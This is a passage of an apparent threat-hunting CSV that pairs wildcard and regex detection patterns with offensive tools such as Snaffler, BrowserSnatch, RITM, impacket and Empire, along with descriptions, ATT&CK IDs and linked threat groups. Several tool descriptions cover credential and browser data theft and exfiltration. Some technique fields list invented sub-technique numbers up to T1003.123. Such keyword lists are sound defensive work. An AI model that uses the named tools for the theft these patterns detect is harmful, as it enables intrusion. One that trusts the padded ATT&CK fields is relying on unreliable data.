tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","59767"
"*SnaffCore/Concurrency*",".{0,1000}SnaffCore\/Concurrency.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","59768"
"*SnaffCore/Config*",".{0,1000}SnaffCore\/Config.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","59769"
"*SnaffCore/ShareFind*",".{0,1000}SnaffCore\/ShareFind.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","59770"
"*SnaffCore/TreeWalk*",".{0,1000}SnaffCore\/TreeWalk.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","59771"
"*Snaffler.csproj*",".{0,1000}Snaffler\.csproj.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","59772"
"*Snaffler.exe*",".{0,1000}Snaffler\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59773"
"*snaffler.exe*",".{0,1000}snaffler\.exe.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","59774"
"*snaffler.exe*",".{0,1000}snaffler\.exe.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","59775"
"*snaffler.log*",".{0,1000}snaffler\.log.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","#logfile","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","59776"
"*Snaffler.Properties*",".{0,1000}Snaffler\.Properties.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59777"
"*Snaffler.sln*",".{0,1000}Snaffler\.sln.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","59778"
"*Snaffler.sln*",".{0,1000}Snaffler\.sln.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","59779"
"*Snaffler.SnaffRules*",".{0,1000}Snaffler\.SnaffRules.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59780"
"*SnafflerMessage.cs*",".{0,1000}SnafflerMessage\.cs.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","59781"
"*SnafflerMessageType.cs*",".{0,1000}SnafflerMessageType\.cs.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","59782"
"*SnaffPoint.exe*",".{0,1000}SnaffPoint\.exe.{0,1000}","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","1","N/A","N/A","7","3","254","25","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z","59783"
"*SnaffPoint-main*",".{0,1000}SnaffPoint\-main.{0,1000}","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","1","N/A","N/A","7","3","254","25","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z","59784"
"*snallygaster*",".{0,1000}snallygaster.{0,1000}","offensive_tool_keyword","snallygaster","Finds file leaks and other security problems on HTTP servers.snallygaster is a tool that looks for files accessible on web servers that shouldn't be public and can pose a security risk.","T1595.001 - T1210","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/hannob/snallygaster","1","0","N/A","N/A","N/A","10","2085","232","2025-04-15T07:25:09Z","2018-04-10T12:01:16Z","59785"
"*Snatching passwords & cookies*",".{0,1000}Snatching\spasswords\s\&\scookies.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#content","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","59788"
"*sneaky_gophish*",".{0,1000}sneaky_gophish.{0,1000}","offensive_tool_keyword","gophish","Hiding GoPhish from the boys in blue","T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001","TA0002 - TA0003","N/A","Black Basta","Phishing","https://github.com/puzzlepeaches/sneaky_gophish/","1","1","N/A","N/A","10","2","180","58","2022-12-06T11:58:00Z","2021-06-24T12:41:54Z","59789"
"*sniff.su/Intercepter-NG*",".{0,1000}sniff\.su\/Intercepter\-NG.{0,1000}","offensive_tool_keyword","Intercepter-NG","android wifi sniffer","T1433","TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/intercepter-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","59790"
"*SniffAir*",".{0,1000}SniffAir.{0,1000}","offensive_tool_keyword","SniffAir","SniffAir is an open-source wireless security framework which provides the ability to easily parse passively collected wireless data as well as launch sophisticated wireless attacks. SniffAir takes care of the hassle associated with managing large or multiple pcap files while thoroughly cross-examining and analyzing the traffic. looking for potential security flaws. Along with the prebuilt queries. SniffAir allows users to create custom queries for analyzing the wireless data stored in the backend SQL database. SniffAir is built on the concept of using these queries to extract data for wireless penetration test reports. The data can also be leveraged in setting up sophisticated wireless attacks included in SniffAir as modules.","T1530 - T1170 - T1059 - T1201","TA0002 - TA0003 - TA0007 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/Tylous/SniffAir","1","1","N/A","network exploitation tool","N/A","10","1206","167","2020-10-14T04:00:27Z","2017-02-20T18:32:32Z","59791"
"*Sniffed AS-REQ from *",".{0,1000}Sniffed\sAS\-REQ\sfrom\s.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","59792"
"*Sniffer waiting for AS-REQ*",".{0,1000}Sniffer\swaiting\sfor\sAS\-REQ.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","59793"
"*sniffer.py*",".{0,1000}sniffer\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","59794"
"*sniffer_dump */tmp/*.pcap*",".{0,1000}sniffer_dump\s.{0,1000}\/tmp\/.{0,1000}\.pcap.{0,1000}","offensive_tool_keyword","metasploit-payloads","shell payload","T1059.001 - T1027 - T1210.001","TA0002 - TA0003 - TA0007","N/A","N/A","Framework","https://github.com/rapid7/metasploit-payloads","1","0","N/A","N/A","10","10","1819","689","2025-02-13T15:01:44Z","2014-04-03T21:18:24Z","59795"
"*sniffer-master.zip*",".{0,1000}sniffer\-master\.zip.{0,1000}","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/chenjiandongx/sniffer","1","1","N/A","N/A","N/A","8","769","67","2024-03-02T07:48:19Z","2021-11-08T15:36:03Z","59796"
"*sniffers.llmnr_sniffer*",".{0,1000}sniffers\.llmnr_sniffer.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","59797"
"*SnifferSpoofer*",".{0,1000}SnifferSpoofer.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - 